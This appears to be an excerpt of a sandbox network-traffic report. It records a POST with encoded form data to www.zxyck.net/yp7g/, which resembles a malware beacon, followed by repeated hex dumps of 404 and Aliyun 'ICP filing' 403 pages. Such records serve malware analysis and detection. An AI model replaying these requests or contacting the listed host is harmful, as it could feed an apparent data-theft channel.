                      Source: unknownHTTP traffic detected: POST /yp7g/ HTTP/1.1Host: www.zxyck.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-USOrigin: http://www.zxyck.netContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 216Connection: closeReferer: http://www.zxyck.net/yp7g/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)Data Raw: 64 30 73 3d 7a 33 72 70 4f 48 56 51 6c 74 76 2f 6b 4d 61 73 61 72 49 56 72 6a 35 41 35 67 53 79 39 4c 41 79 63 71 72 72 6c 79 54 6c 46 51 2f 7a 4a 39 6f 56 72 71 61 5a 6c 79 6a 6a 73 35 43 37 50 2f 39 46 33 53 62 37 63 76 33 62 31 47 35 63 68 69 79 4d 4b 49 4d 41 70 6d 35 2f 70 39 6a 57 70 73 35 71 41 51 46 46 42 56 71 70 64 4c 31 53 2b 38 33 71 61 45 55 6b 6e 41 43 6b 69 65 42 68 35 49 39 2b 7a 59 70 31 48 39 45 4b 6a 6d 48 56 70 2b 65 56 33 4a 7a 76 58 49 46 70 51 5a 68 56 32 67 65 30 57 5a 64 63 74 72 52 4e 4b 66 34 76 72 65 72 71 68 4d 6c 63 4e 34 6f 75 48 47 47 31 78 53 48 42 58 48 4d 61 4d 41 74 7a 32 41 6d 47 59 76 71 42 75 77 3d 3d Data Ascii: d0s=z3rpOHVQltv/kMasarIVrj5A5gSy9LAycqrrlyTlFQ/zJ9oVrqaZlyjjs5C7P/9F3Sb7cv3b1G5chiyMKIMApm5/p9jWps5qAQFFBVqpdL1S+83qaEUknACkieBh5I9+zYp1H9EKjmHVp+eV3JzvXIFpQZhV2ge0WZdctrRNKf4vrerqhMlcN4ouHGG1xSHBXHMaMAtz2AmGYvqBuw==
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:45 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:48 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:53 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 34 32 35 32 32 30 36 36 38 31 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 34 32 35 32 32 30 36 36 38 31 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 34 32 35 32 32 30 36 36 38 31 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 34 32 35 32 32 30 36 36 38 31 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> 